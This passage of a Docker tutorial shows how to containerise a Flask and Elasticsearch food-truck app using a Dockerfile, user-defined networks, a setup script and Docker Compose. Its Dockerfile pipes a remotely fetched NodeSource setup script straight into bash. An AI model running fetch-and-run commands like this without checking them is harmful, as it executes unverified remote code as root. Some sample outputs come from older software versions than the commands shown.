Now that you're excited (hopefully), let's think of how we can Dockerize the app. We can see that the application consists of a Flask backend server and an Elasticsearch service. A natural way to split this app would be to have two containers - one running the Flask process and another running the Elasticsearch (ES) process. That way if our app becomes popular, we can scale it by adding more containers depending on where the bottleneck lies.
Great, so we need two containers. That shouldn't be hard right? We've already built our own Flask container in the previous section. And for Elasticsearch, let's see if we can find something on the hub.
$ docker search elasticsearch
NAME DESCRIPTION STARS OFFICIAL AUTOMATED
elasticsearch Elasticsearch is a powerful open source se... 697 [OK]
itzg/elasticsearch Provides an easily configurable Elasticsea... 17 [OK]
tutum/elasticsearch Elasticsearch image - listens in port 9200. 15 [OK]
barnybug/elasticsearch Latest Elasticsearch 1.7.2 and previous re... 15 [OK]
digitalwonderland/elasticsearch Latest Elasticsearch with Marvel & Kibana 12 [OK]
monsantoco/elasticsearch ElasticSearch Docker image 9 [OK]
Quite unsurprisingly, there exists an officially supported image for Elasticsearch. To get ES running, we can simply use docker run
and have a single-node ES container running locally within no time.
Note: Elastic, the company behind Elasticsearch, maintains its own registry for Elastic products. It's recommended to use the images from that registry if you plan to use Elasticsearch.
Let's first pull the image
$ docker pull docker.elastic.co/elasticsearch/elasticsearch:6.3.2
and then run it in development mode by specifying ports and setting an environment variable that configures the Elasticsearch cluster to run as a single-node.
$ docker run -d --name es -p 9200:9200 -p 9300:9300 -e "discovery.type=single-node" docker.elastic.co/elasticsearch/elasticsearch:6.3.2
277451c15ec183dd939e80298ea4bcf55050328a39b04124b387d668e3ed3943
Note: If your container runs into memory issues, you might need to tweak some JVM flags to limit its memory consumption.
As seen above, we use --name es
to give our container a name which makes it easy to use in subsequent commands. Once the container is started, we can see the logs by running docker container logs
with the container name (or ID) to inspect the logs. You should see logs similar to below if Elasticsearch started successfully.
Note: Elasticsearch takes a few seconds to start so you might need to wait before you see
initialized
in the logs.
$ docker container ls
CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES
277451c15ec1 docker.elastic.co/elasticsearch/elasticsearch:6.3.2 "/usr/local/bin/dock…" 2 minutes ago Up 2 minutes 0.0.0.0:9200->9200/tcp, 0.0.0.0:9300->9300/tcp es
$ docker container logs es
[2018-07-29T05:49:09,304][INFO ][o.e.n.Node ] [] initializing ...
[2018-07-29T05:49:09,385][INFO ][o.e.e.NodeEnvironment ] [L1VMyzt] using [1] data paths, mounts [[/ (overlay)]], net usable_space [54.1gb], net total_space [62.7gb], types [overlay]
[2018-07-29T05:49:09,385][INFO ][o.e.e.NodeEnvironment ] [L1VMyzt] heap size [990.7mb], compressed ordinary object pointers [true]
[2018-07-29T05:49:11,979][INFO ][o.e.p.PluginsService ] [L1VMyzt] loaded module [x-pack-security]
[2018-07-29T05:49:11,980][INFO ][o.e.p.PluginsService ] [L1VMyzt] loaded module [x-pack-sql]
[2018-07-29T05:49:11,980][INFO ][o.e.p.PluginsService ] [L1VMyzt] loaded module [x-pack-upgrade]
[2018-07-29T05:49:11,980][INFO ][o.e.p.PluginsService ] [L1VMyzt] loaded module [x-pack-watcher]
[2018-07-29T05:49:11,981][INFO ][o.e.p.PluginsService ] [L1VMyzt] loaded plugin [ingest-geoip]
[2018-07-29T05:49:11,981][INFO ][o.e.p.PluginsService ] [L1VMyzt] loaded plugin [ingest-user-agent]
[2018-07-29T05:49:17,659][INFO ][o.e.d.DiscoveryModule ] [L1VMyzt] using discovery type [single-node]
[2018-07-29T05:49:18,962][INFO ][o.e.n.Node ] [L1VMyzt] initialized
[2018-07-29T05:49:18,963][INFO ][o.e.n.Node ] [L1VMyzt] starting ...
[2018-07-29T05:49:19,218][INFO ][o.e.t.TransportService ] [L1VMyzt] publish_address {172.17.0.2:9300}, bound_addresses {0.0.0.0:9300}
[2018-07-29T05:49:19,302][INFO ][o.e.x.s.t.n.SecurityNetty4HttpServerTransport] [L1VMyzt] publish_address {172.17.0.2:9200}, bound_addresses {0.0.0.0:9200}
[2018-07-29T05:49:19,303][INFO ][o.e.n.Node ] [L1VMyzt] started
[2018-07-29T05:49:19,439][WARN ][o.e.x.s.a.s.m.NativeRoleMappingStore] [L1VMyzt] Failed to clear cache for realms [[]]
[2018-07-29T05:49:19,542][INFO ][o.e.g.GatewayService ] [L1VMyzt] recovered [0] indices into cluster_state
Now, lets try to see if can send a request to the Elasticsearch container. We use the 9200
port to send a cURL
request to the container.
$ curl 0.0.0.0:9200
{
"name" : "ijJDAOm",
"cluster_name" : "docker-cluster",
"cluster_uuid" : "a_nSV3XmTCqpzYYzb-LhNw",
"version" : {
"number" : "6.3.2",
"build_flavor" : "default",
"build_type" : "tar",
"build_hash" : "053779d",
"build_date" : "2018-07-20T05:20:23.451332Z",
"build_snapshot" : false,
"lucene_version" : "7.3.1",
"minimum_wire_compatibility_version" : "5.6.0",
"minimum_index_compatibility_version" : "5.0.0"
},
"tagline" : "You Know, for Search"
}
Sweet! It's looking good! While we are at it, let's get our Flask container running too. But before we get to that, we need a Dockerfile
. In the last section, we used python:3.8
image as our base image. This time, however, apart from installing Python dependencies via pip
, we want our application to also generate our minified Javascript file for production. For this, we'll require Nodejs. Since we need a custom build step, we'll start from the ubuntu
base image to build our Dockerfile
from scratch.
Note: if you find that an existing image doesn't cater to your needs, feel free to start from another base image and tweak it yourself. For most of the images on Docker Hub, you should be able to find the corresponding
Dockerfile
on Github. Reading through existing Dockerfiles is one of the best ways to learn how to roll your own.
Our Dockerfile for the flask app looks like below -
# start from base
FROM ubuntu:18.04
MAINTAINER Prakhar Srivastav <prakhar@prakhar.me>
# install system-wide deps for python and node
RUN apt-get -yqq update
RUN apt-get -yqq install python3-pip python3-dev curl gnupg
RUN curl -sL https://deb.nodesource.com/setup_10.x | bash
RUN apt-get install -yq nodejs
# copy our application code
ADD flask-app /opt/flask-app
WORKDIR /opt/flask-app
# fetch app specific deps
RUN npm install
RUN npm run build
RUN pip3 install -r requirements.txt
# expose port
EXPOSE 5000
# start app
CMD [ "python3", "./app.py" ]
Quite a few new things here so let's quickly go over this file. We start off with the Ubuntu LTS base image and use the package manager apt-get
to install the dependencies namely - Python and Node. The yqq
flag is used to suppress output and assumes "Yes" to all prompts.
We then use the ADD
command to copy our application into a new volume in the container - /opt/flask-app
. This is where our code will reside. We also set this as our working directory, so that the following commands will be run in the context of this location. Now that our system-wide dependencies are installed, we get around to installing app-specific ones. First off we tackle Node by installing the packages from npm and running the build command as defined in our package.json
file. We finish the file off by installing the Python packages, exposing the port and defining the CMD
to run as we did in the last section.
Finally, we can go ahead, build the image and run the container (replace yourusername
with your username below).
$ docker build -t yourusername/foodtrucks-web .
In the first run, this will take some time as the Docker client will download the ubuntu image, run all the commands and prepare your image. Re-running docker build
after any subsequent changes you make to the application code will almost be instantaneous. Now let's try running our app.
$ docker run -P --rm yourusername/foodtrucks-web
Unable to connect to ES. Retying in 5 secs...
Unable to connect to ES. Retying in 5 secs...
Unable to connect to ES. Retying in 5 secs...
Out of retries. Bailing out...
Oops! Our flask app was unable to run since it was unable to connect to Elasticsearch. How do we tell one container about the other container and get them to talk to each other? The answer lies in the next section.
Docker Network
Before we talk about the features Docker provides especially to deal with such scenarios, let's see if we can figure out a way to get around the problem. Hopefully, this should give you an appreciation for the specific feature that we are going to study.
Okay, so let's run docker container ls
(which is same as docker ps
) and see what we have.
$ docker container ls
CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES
277451c15ec1 docker.elastic.co/elasticsearch/elasticsearch:6.3.2 "/usr/local/bin/dock…" 17 minutes ago Up 17 minutes 0.0.0.0:9200->9200/tcp, 0.0.0.0:9300->9300/tcp es
So we have one ES container running on 0.0.0.0:9200
port which we can directly access. If we can tell our Flask app to connect to this URL, it should be able to connect and talk to ES, right? Let's dig into our Python code and see how the connection details are defined.
es = Elasticsearch(host='es')
To make this work, we need to tell the Flask container that the ES container is running on 0.0.0.0
host (the port by default is 9200
) and that should make it work, right? Unfortunately, that is not correct since the IP 0.0.0.0
is the IP to access ES container from the host machine i.e. from my Mac. Another container will not be able to access this on the same IP address. Okay if not that IP, then which IP address should the ES container be accessible by? I'm glad you asked this question.
Now is a good time to start our exploration of networking in Docker. When docker is installed, it creates three networks automatically.
$ docker network ls
NETWORK ID NAME DRIVER SCOPE
c2c695315b3a bridge bridge local
a875bec5d6fd host host local
ead0e804a67b none null local
The bridge network is the network in which containers are run by default. So that means that when I ran the ES container, it was running in this bridge network. To validate this, let's inspect the network.
$ docker network inspect bridge
[
{
"Name": "bridge",
"Id": "c2c695315b3aaf8fc30530bb3c6b8f6692cedd5cc7579663f0550dfdd21c9a26",
"Created": "2018-07-28T20:32:39.405687265Z",
"Scope": "local",
"Driver": "bridge",
"EnableIPv6": false,
"IPAM": {
"Driver": "default",
"Options": null,
"Config": [
{
"Subnet": "172.17.0.0/16",
"Gateway": "172.17.0.1"
}
]
},
"Internal": false,
"Attachable": false,
"Ingress": false,
"ConfigFrom": {
"Network": ""
},
"ConfigOnly": false,
"Containers": {
"277451c15ec183dd939e80298ea4bcf55050328a39b04124b387d668e3ed3943": {
"Name": "es",
"EndpointID": "5c417a2fc6b13d8ec97b76bbd54aaf3ee2d48f328c3f7279ee335174fbb4d6bb",
"MacAddress": "02:42:ac:11:00:02",
"IPv4Address": "172.17.0.2/16",
"IPv6Address": ""
}
},
"Options": {
"com.docker.network.bridge.default_bridge": "true",
"com.docker.network.bridge.enable_icc": "true",
"com.docker.network.bridge.enable_ip_masquerade": "true",
"com.docker.network.bridge.host_binding_ipv4": "0.0.0.0",
"com.docker.network.bridge.name": "docker0",
"com.docker.network.driver.mtu": "1500"
},
"Labels": {}
}
]
You can see that our container 277451c15ec1
is listed under the Containers
section in the output. What we also see is the IP address this container has been allotted - 172.17.0.2
. Is this the IP address that we're looking for? Let's find out by running our flask container and trying to access this IP.
$ docker run -it --rm yourusername/foodtrucks-web bash
root@35180ccc206a:/opt/flask-app# curl 172.17.0.2:9200
{
"name" : "Jane Foster",
"cluster_name" : "elasticsearch",
"version" : {
"number" : "2.1.1",
"build_hash" : "40e2c53a6b6c2972b3d13846e450e66f4375bd71",
"build_timestamp" : "2015-12-15T13:05:55Z",
"build_snapshot" : false,
"lucene_version" : "5.3.1"
},
"tagline" : "You Know, for Search"
}
root@35180ccc206a:/opt/flask-app# exit
This should be fairly straightforward to you by now. We start the container in the interactive mode with the bash
process. The --rm
is a convenient flag for running one off commands since the container gets cleaned up when its work is done. We try a curl
but we need to install it first. Once we do that, we see that we can indeed talk to ES on 172.17.0.2:9200
. Awesome!
Although we have figured out a way to make the containers talk to each other, there are still two problems with this approach -
- How do we tell the Flask container that
es
hostname stands for172.17.0.2
or some other IP since the IP can change? - Since the bridge network is shared by every container by default, this method is not secure. How do we isolate our network?
The good news that Docker has a great answer to our questions. It allows us to define our own networks while keeping them isolated using the docker network
command.
Let's first go ahead and create our own network.
$ docker network create foodtrucks-net
0815b2a3bb7a6608e850d05553cc0bda98187c4528d94621438f31d97a6fea3c
$ docker network ls
NETWORK ID NAME DRIVER SCOPE
c2c695315b3a bridge bridge local
0815b2a3bb7a foodtrucks-net bridge local
a875bec5d6fd host host local
ead0e804a67b none null local
The network create
command creates a new bridge network, which is what we need at the moment. In terms of Docker, a bridge network uses a software bridge which allows containers connected to the same bridge network to communicate, while providing isolation from containers which are not connected to that bridge network. The Docker bridge driver automatically installs rules in the host machine so that containers on different bridge networks cannot communicate directly with each other. There are other kinds of networks that you can create, and you are encouraged to read about them in the official docs.
Now that we have a network, we can launch our containers inside this network using the --net
flag. Let's do that - but first, in order to launch a new container with the same name, we will stop and remove our ES container that is running in the bridge (default) network.
$ docker container stop es
es
$ docker container rm es
es
$ docker run -d --name es --net foodtrucks-net -p 9200:9200 -p 9300:9300 -e "discovery.type=single-node" docker.elastic.co/elasticsearch/elasticsearch:6.3.2
13d6415f73c8d88bddb1f236f584b63dbaf2c3051f09863a3f1ba219edba3673
$ docker network inspect foodtrucks-net
[
{
"Name": "foodtrucks-net",
"Id": "0815b2a3bb7a6608e850d05553cc0bda98187c4528d94621438f31d97a6fea3c",
"Created": "2018-07-30T00:01:29.1500984Z",
"Scope": "local",
"Driver": "bridge",
"EnableIPv6": false,
"IPAM": {
"Driver": "default",
"Options": {},
"Config": [
{
"Subnet": "172.18.0.0/16",
"Gateway": "172.18.0.1"
}
]
},
"Internal": false,
"Attachable": false,
"Ingress": false,
"ConfigFrom": {
"Network": ""
},
"ConfigOnly": false,
"Containers": {
"13d6415f73c8d88bddb1f236f584b63dbaf2c3051f09863a3f1ba219edba3673": {
"Name": "es",
"EndpointID": "29ba2d33f9713e57eb6b38db41d656e4ee2c53e4a2f7cf636bdca0ec59cd3aa7",
"MacAddress": "02:42:ac:12:00:02",
"IPv4Address": "172.18.0.2/16",
"IPv6Address": ""
}
},
"Options": {},
"Labels": {}
}
]
As you can see, our es
container is now running inside the foodtrucks-net
bridge network. Now let's inspect what happens when we launch in our foodtrucks-net
network.
$ docker run -it --rm --net foodtrucks-net yourusername/foodtrucks-web bash
root@9d2722cf282c:/opt/flask-app# curl es:9200
{
"name" : "wWALl9M",
"cluster_name" : "docker-cluster",
"cluster_uuid" : "BA36XuOiRPaghPNBLBHleQ",
"version" : {
"number" : "6.3.2",
"build_flavor" : "default",
"build_type" : "tar",
"build_hash" : "053779d",
"build_date" : "2018-07-20T05:20:23.451332Z",
"build_snapshot" : false,
"lucene_version" : "7.3.1",
"minimum_wire_compatibility_version" : "5.6.0",
"minimum_index_compatibility_version" : "5.0.0"
},
"tagline" : "You Know, for Search"
}
root@53af252b771a:/opt/flask-app# ls
app.py node_modules package.json requirements.txt static templates webpack.config.js
root@53af252b771a:/opt/flask-app# python3 app.py
Index not found...
Loading data in elasticsearch ...
Total trucks loaded: 733
* Running on http://0.0.0.0:5000/ (Press CTRL+C to quit)
root@53af252b771a:/opt/flask-app# exit
Wohoo! That works! On user-defined networks like foodtrucks-net, containers can not only communicate by IP address, but can also resolve a container name to an IP address. This capability is called automatic service discovery. Great! Let's launch our Flask container for real now -
$ docker run -d --net foodtrucks-net -p 5000:5000 --name foodtrucks-web yourusername/foodtrucks-web
852fc74de2954bb72471b858dce64d764181dca0cf7693fed201d76da33df794
$ docker container ls
CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES
852fc74de295 yourusername/foodtrucks-web "python3 ./app.py" About a minute ago Up About a minute 0.0.0.0:5000->5000/tcp foodtrucks-web
13d6415f73c8 docker.elastic.co/elasticsearch/elasticsearch:6.3.2 "/usr/local/bin/dock…" 17 minutes ago Up 17 minutes 0.0.0.0:9200->9200/tcp, 0.0.0.0:9300->9300/tcp es
$ curl -I 0.0.0.0:5000
HTTP/1.0 200 OK
Content-Type: text/html; charset=utf-8
Content-Length: 3697
Server: Werkzeug/0.11.2 Python/2.7.6
Date: Sun, 10 Jan 2016 23:58:53 GMT
Head over to http://0.0.0.0:5000 and see your glorious app live! Although that might have seemed like a lot of work, we actually just typed 4 commands to go from zero to running. I've collated the commands in a bash script.
#!/bin/bash
# build the flask container
docker build -t yourusername/foodtrucks-web .
# create the network
docker network create foodtrucks-net
# start the ES container
docker run -d --name es --net foodtrucks-net -p 9200:9200 -p 9300:9300 -e "discovery.type=single-node" docker.elastic.co/elasticsearch/elasticsearch:6.3.2
# start the flask app container
docker run -d --net foodtrucks-net -p 5000:5000 --name foodtrucks-web yourusername/foodtrucks-web
Now imagine you are distributing your app to a friend, or running on a server that has docker installed. You can get a whole app running with just one command!
$ git clone https://github.com/prakhar1989/FoodTrucks
$ cd FoodTrucks
$ ./setup-docker.sh
And that's it! If you ask me, I find this to be an extremely awesome, and a powerful way of sharing and running your applications!
Docker Compose
Till now we've spent all our time exploring the Docker client. In the Docker ecosystem, however, there are a bunch of other open-source tools which play very nicely with Docker. A few of them are -
- Docker Machine - Create Docker hosts on your computer, on cloud providers, and inside your own data center
- Docker Compose - A tool for defining and running multi-container Docker applications.
- Docker Swarm - A native clustering solution for Docker
- Kubernetes - Kubernetes is an open-source system for automating deployment, scaling, and management of containerized applications.
In this section, we are going to look at one of these tools, Docker Compose, and see how it can make dealing with multi-container apps easier.
The background story of Docker Compose is quite interesting. Roughly around January 2014, a company called OrchardUp launched a tool called Fig. The idea behind Fig was to make isolated development environments work with Docker. The project was very well received on Hacker News - I oddly remember reading about it but didn't quite get the hang of it.
The first comment on the forum actually does a good job of explaining what Fig is all about.
So really at this point, that's what Docker is about: running processes. Now Docker offers a quite rich API to run the processes: shared volumes (directories) between containers (i.e. running images), forward port from the host to the container, display logs, and so on. But that's it: Docker as of now, remains at the process level.
While it provides options to orchestrate multiple containers to create a single "app", it doesn't address the management of such group of containers as a single entity. And that's where tools such as Fig come in: talking about a group of containers as a single entity. Think "run an app" (i.e. "run an orchestrated cluster of containers") instead of "run a container".
It turns out that a lot of people using docker agree with this sentiment. Slowly and steadily as Fig became popular, Docker Inc. took notice, acquired the company and re-branded Fig as Docker Compose.
So what is Compose used for? Compose is a tool that is used for defining and running multi-container Docker apps in an easy way. It provides a configuration file called docker-compose.yml
that can be used to bring up an application and the suite of services it depends on with just one command. Compose works in all environments: production, staging, development, testing, as well as CI workflows, although Compose is ideal for development and testing environments.
Let's see if we can create a docker-compose.yml
file for our SF-Foodtrucks app and evaluate whether Docker Compose lives up to its promise.
The first step, however, is to install Docker Compose. If you're running Windows or Mac, Docker Compose is already installed as it comes in the Docker Toolbox. Linux users can easily get their hands on Docker Compose by following the instructions on the docs. Since Compose is written in Python, you can also simply do pip install docker-compose
. Test your installation with -
$ docker-compose --version
docker-compose version 1.21.2, build a133471
Now that we have it installed, we can jump on the next step i.e. the Docker Compose file docker-compose.yml
. The syntax for YAML is quite simple and the repo already contains the docker-compose file that we'll be using.
version: "3"
services:
es:
image: docker.elastic.co/elasticsearch/elasticsearch:6.3.2
container_name: es
environment:
- discovery.type=single-node
ports:
- 9200:9200
volumes:
- esdata1:/usr/share/elasticsearch/data
web:
image: yourusername/foodtrucks-web
command: python3 app.py
depends_on:
- es
ports:
- 5000:5000
volumes:
- ./flask-app:/opt/flask-app
volumes:
esdata1:
driver: local
Let me breakdown what the file above means. At the parent level, we define the names of our services - es
and web
. The image
parameter is always required, and for each service that we want Docker to run, we can add additional parameters. For es
, we just refer to the elasticsearch
image available on Elastic registry. For our Flask app, we refer to the image that we built at the beginning of this section.
Other parameters such as command
and ports
provide more information about the container. The volumes
parameter specifies a mount point in our web
container where the code will reside. This is purely optional and is useful if you need access to logs, etc. We'll later see how this can be useful during development. Refer to the online reference to learn more about the parameters this file supports. We also add volumes for the es
container so that the data we load persists between restarts. We also specify depends_on
, which tells docker to start the es
container before web
. You can read more about it on docker compose docs.
Note: You must be inside the directory with the
docker-compose.yml
file in order to execute most Compose commands.
Great! Now the file is ready, let's see docker-compose
in action. But before we start, we need to make sure the ports and names are free. So if you have the Flask and ES containers running, lets turn them off.
$ docker stop es foodtrucks-web
es
foodtrucks-web
$ docker rm es foodtrucks-web
es
foodtrucks-web
Now we can run docker-compose
. Navigate to the food trucks directory and run docker-compose up
.
$ docker-compose up
Creating network "foodtrucks_default" with the default driver
Creating foodtrucks_es_1
Creating foodtrucks_web_1
Attaching to foodtrucks_es_1, foodtrucks_web_1
es_1 | [2016-01-11 03:43:50,300][INFO ][node ] [Comet] version[2.1.1], pid[1], build[40e2c53/2015-12-15T13:05:55Z]
es_1 | [2016-01-11 03:43:50,307][INFO ][node ] [Comet] initializing ...
es_1 | [2016-01-11 03:43:50,366][INFO ][plugins ] [Comet] loaded [], sites []
es_1 | [2016-01-11 03:43:50,421][INFO ][env ] [Comet] using [1] data paths, mounts [[/usr/share/elasticsearch/data (/dev/sda1)]], net usable_space [16gb], net total_space [18.1gb], spins? [possibly], types [ext4]
es_1 | [2016-01-11 03:43:52,626][INFO ][node ] [Comet] initialized
es_1 | [2016-01-11 03:43:52,632][INFO ][node ] [Comet] starting ...
es_1 | [2016-01-11 03:43:52,703][WARN ][common.network ] [Comet] publish address: {0.0.0.0} is a wildcard address, falling back to first non-loopback: {172.17.0.2}
es_1 | [2016-01-11 03:43:52,704][INFO ][transport ] [Comet] publish_address {172.17.0.2:9300}, bound_addresses {[::]:9300}
es_1 | [2016-01-11 03:43:52,721][INFO ][discovery ] [Comet] elasticsearch/cEk4s7pdQ-evRc9MqS2wqw
es_1 | [2016-01-11 03:43:55,785][INFO ][cluster.service ] [Comet] new_master {Comet}{cEk4s7pdQ-evRc9MqS2wqw}{172.17.0.2}{172.17.0.2:9300}, reason: zen-disco-join(elected_as_master, [0] joins received)
es_1 | [2016-01-11 03:43:55,818][WARN ][common.network ] [Comet] publish address: {0.0.0.0} is a wildcard address, falling back to first non-loopback: {172.17.0.2}
es_1 | [2016-01-11 03:43:55,819][INFO ][http ] [Comet] publish_address {172.17.0.2:9200}, bound_addresses {[::]:9200}
es_1 | [2016-01-11 03:43:55,819][INFO ][node ] [Comet] started
es_1 | [2016-01-11 03:43:55,826][INFO ][gateway ] [Comet] recovered [0] indices into cluster_state
es_1 | [2016-01-11 03:44:01,825][INFO ][cluster.metadata ] [Comet] [sfdata] creating index, cause [auto(index api)], templates [], shards [5]/[1], mappings [truck]
es_1 | [2016-01-11 03:44:02,373][INFO ][cluster.metadata ] [Comet] [sfdata] update_mapping [truck]
es_1 | [2016-01-11 03:44:02,510][INFO ][cluster.metadata ] [Comet] [sfdata] update_mapping [truck]
es_1 | [2016-01-11 03:44:02,593][INFO ][cluster.metadata ] [Comet] [sfdata] update_mapping [truck]
es_1 | [2016-01-11 03:44:02,708][INFO ][cluster.metadata ] [Comet] [sfdata] update_mapping [truck]
es_1 | [2016-01-11 03:44:03,047][INFO ][cluster.metadata ] [Comet] [sfdata] update_mapping [truck]
web_1 | * Running on http://0.0.0.0:5000/ (Press CTRL+C to quit)
Head over to the IP to see your app live. That was amazing wasn't it? Just a few lines of configuration and we have two Docker containers running successfully in unison. Let's stop the services and re-run in detached mode.
web_1 | * Running on http://0.0.0.0:5000/ (Press CTRL+C to quit)
Killing foodtrucks_web_1 ... done
Killing foodtrucks_es_1 ... done
$ docker-compose up -d
Creating es ... done
Creating foodtrucks_web_1 ... done
$ docker-compose ps
Name Command State Ports
--------------------------------------------------------------------------------------------
es /usr/local/bin/docker-entr ... Up 0.0.0.0:9200->9200/tcp, 9300/tcp
foodtrucks_web_1 python3 app.py Up 0.0.0.0:5000->5000/tcp
Unsurprisingly, we can see both containers running successfully. Where do the names come from? Those were created automatically by Compose. But does Compose also create the network automatically? Good question! Let's find out.
First off, let us stop the services from running. We can always bring them back up with just one command. Data volumes will persist, so it’s possible to start the cluster again with the same data using docker-compose up
. To destroy the cluster and the data volumes, just type docker-compose down -v
.
$ docker-compose down -v
Stopping foodtrucks_web_1 ... done
Stopping es ... done
Removing foodtrucks_web_1 ... done
Removing es ... done
Removing network foodtrucks_default
Removing volume foodtrucks_esdata1
While we're are at it, we'll also remove the foodtrucks
network that we created last time.
$ docker network rm foodtrucks-net
$ docker network ls
NETWORK ID NAME DRIVER SCOPE
c2c695315b3a bridge bridge local
a875bec5d6fd host host local
ead0e804a67b none null local
Great! Now that we have a clean slate, let's re-run our services and see if Compose does its magic.
$ docker-compose up -d
Recreating foodtrucks_es_1
Recreating foodtrucks_web_1
$ docker container ls
CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES
f50bb33a3242 yourusername/foodtrucks-web "python3 app.py" 14 seconds ago Up 13 seconds 0.0.0.0:5000->5000/tcp foodtrucks_web_1
e299ceeb4caa elasticsearch "/docker-entrypoint.s" 14 seconds ago Up 14 seconds 9200/tcp, 9300/tcp foodtrucks_es_1
So far, so good. Time to see if any networks were created.
$ docker network ls
NETWORK ID NAME DRIVER
c2c695315b3a bridge bridge local
f3b80f381ed3 foodtrucks_default bridge local
a875bec5d6fd host host local
ead0e804a67b none null local
You can see that compose went ahead and created a new network called foodtrucks_default
and attached both the new services in that network so that each of these are discoverable to the other. Each container for a service joins the default network and is both reachable by other containers on that network, and discoverable by them at a hostname identical to the container name.
$ docker ps
CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES
8c6bb7e818ec docker.elastic.co/elasticsearch/elasticsearch:6.3.2 "/usr/local/bin/dock…" About a minute ago Up About a minute 0.0.0.0:9200->9200/tcp, 9300/tcp es
7640cec7feb7 yourusername/foodtrucks-web "python3 app.py" About a minute ago Up About a minute 0.0.0.0:5000->5000/tcp foodtrucks_web_1
$ docker network inspect foodtrucks_default
[
{
"Name": "foodtrucks_default",
"Id": "f3b80f381ed3e03b3d5e605e42c4a576e32d38ba24399e963d7dad848b3b4fe7",
"Created": "2018-07-30T03:36:06.0384826Z",
"Scope": "local",
"Driver": "bridge",
"EnableIPv6": false,
"IPAM": {
"Driver": "default",
"Options": null,
"Config": [
{
"Subnet": "172.19.0.0/16",
"Gateway": "172.19.0.1"
}
]
},
"Internal": false,
"Attachable": true,
"Ingress": false,
"ConfigFrom": {
"Network": ""
},
"ConfigOnly": false,
"Containers": {
"7640cec7feb7f5615eaac376271a93fb8bab2ce54c7257256bf16716e05c65a5": {
"Name": "foodtrucks_web_1",
"EndpointID": "b1aa3e735402abafea3edfbba605eb4617f81d94f1b5f8fcc566a874660a0266",
"MacAddress": "02:42:ac:13:00:02",
"IPv4Address": "172.19.0.2/16",
"IPv6Address": ""
},
"8c6bb7e818ec1f88c37f375c18f00beb030b31f4b10aee5a0952aad753314b57": {
"Name": "es",
"EndpointID": "649b3567d38e5e6f03fa6c004a4302508c14a5f2ac086ee6dcf13ddef936de7b",
"MacAddress": "02:42:ac:13:00:03",
"IPv4Address": "172.19.0.3/16",
"IPv6Address": ""
}
},
"Options": {},
"Labels": {
"com.docker.compose.network": "default",
"com.docker.compose.project": "foodtrucks",
"com.docker.compose.version": "1.21.2"
}
}
]
Development Workflow
Before we jump to the next section, there's one last thing I wanted to cover about docker-compose. As stated earlier, docker-compose is really great for development and testing. So let's see how we can configure compose to make our lives easier during development.
Throughout this tutorial, we've worked with readymade docker images. While we've built images from scratch, we haven't touched any application code yet and mostly restricted ourselves to editing Dockerfiles and YAML configurations. One thing that you must be wondering is how does the workflow look during development? Is one supposed to keep creating Docker images for every change, then publish it and then run it to see if the changes work as expected? I'm sure that sounds super tedious. There has to be a better way. In this section, that's what we're going to explore.
Let's see how we can make a change in the Foodtrucks app we just ran. Make sure you have the app running,
$ docker container ls
CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES
5450ebedd03c yourusername/foodtrucks-web "python3 app.py" 9 seconds ago Up 6 seconds 0.0.0.0:5000->5000/tcp foodtrucks_web_1
05d408b25dfe docker.elastic.co/elasticsearch/elasticsearch:6.3.2 "/usr/local/bin/dock…" 10 hours ago Up 10 hours 0.0.0.0:9200->9200/tcp, 9300/tcp es
Now let's see if we can change this app to display a Hello world!
message when a request is made to /hello
route. Currently, the app responds with a 404.
$ curl -I 0.0.0.0:5000/hello
HTTP/1.0 404 NOT FOUND
Content-Type: text/html
Content-Length: 233
Server: Werkzeug/0.11.2 Python/2.7.15rc1
Date: Mon, 30 Jul 2018 15:34:38 GMT
Why does this happen? Since ours is a Flask app, we can see app.py
(link) for answers. In Flask, routes are defined with @app.route syntax. In the file, you'll see that we only have three routes defined - /
,/debug
and/search
. The/
route renders the main app, thedebug
route is used to return some debug information and finallysearch
is used by the app to query elasticsearch.
$ curl 0.0.0.0:5000/debug
{
"msg": "yellow open sfdata Ibkx7WYjSt-g8NZXOEtTMg 5 1 618 0 1.3mb 1.3mb\n",
"status": "success"
}
Given that context, how would we add a new route for hello
? You guessed it! Let's open flask-app/app.py
in our favorite editor and make the following change
@app.route('/')
def index():
return render_template("index.html")
# add a new hello route
@app.route('/hello')
def hello():
return "hello world!"
Now let's try making a request again
$ curl -I 0.0.0.0:5000/hello
HTTP/1.0 404 NOT FOUND
Content-Type: text/html
Content-Length: 233
Server: Werkzeug/0.11.2 Python/2.7.15rc1
Date: Mon, 30 Jul 2018 15:34:38 GMT
Oh no! That didn't work! What did we do wrong? While we did make the change in app.py
, the file resides in our machine (or the host machine), but since Docker is running our containers based off the yourusername/foodtrucks-web
image, it doesn't know about this change. To validate this, lets try the following -
$ docker-compose run web bash
Starting es ... done
root@581e351c82b0:/opt/flask-app# ls
app.py package-lock.json requirements.txt templates
node_modules package.json static webpack.config.js
root@581e351c82b0:/opt/flask-app# grep hello app.py
root@581e351c82b0:/opt/flask-app# exit
What we're trying to do here is to validate that our changes are not in the app.py
that's running in the container. We do this by running the command docker-compose run
, which is similar to its cousin docker run
but takes additional arguments for the service (which is web
in our case). As soon as we run bash
, the shell opens in /opt/flask-app
as specified in our Dockerfile. From the grep command we can see that our changes are not in the file.
Lets see how we can fix it. First off, we need to tell docker compose to not use the image and instead use the files locally. We'll also set debug mode to true
so that Flask knows to reload the server when app.py
changes. Replace the web
portion of the docker-compose.yml
file like so:
version: "3"
services:
es:
image: docker.elastic.co/elasticsearch/elasticsearch:6.3.2
container_name: es
environment:
- discovery.type=single-node
ports:
- 9200:9200
volumes:
- esdata1:/usr/share/elasticsearch/data
web:
build: . # replaced image with build
command: python3 app.py
environment:
- DEBUG=True # set an env var for flask
depends_on:
- es
ports:
- "5000:5000"
volumes:
- ./flask-app:/opt/flask-app
volumes:
esdata1:
driver: local
With that change (diff), let's stop and start the containers.
$ docker-compose down -v
Stopping foodtrucks_web_1 ... done
Stopping es ... done
Removing foodtrucks_web_1 ... done
Removing es ... done
Removing network foodtrucks_default
Removing volume foodtrucks_esdata1
$ docker-compose up -d
Creating network "foodtrucks_default" with the default driver
Creating volume "foodtrucks_esdata1" with local driver
Creating es ... done
Creating foodtrucks_web_1 ... done
As a final step, lets make the change in app.py
by adding a new route. Now we try to curl
$ curl 0.0.0.0:5000/hello
hello world
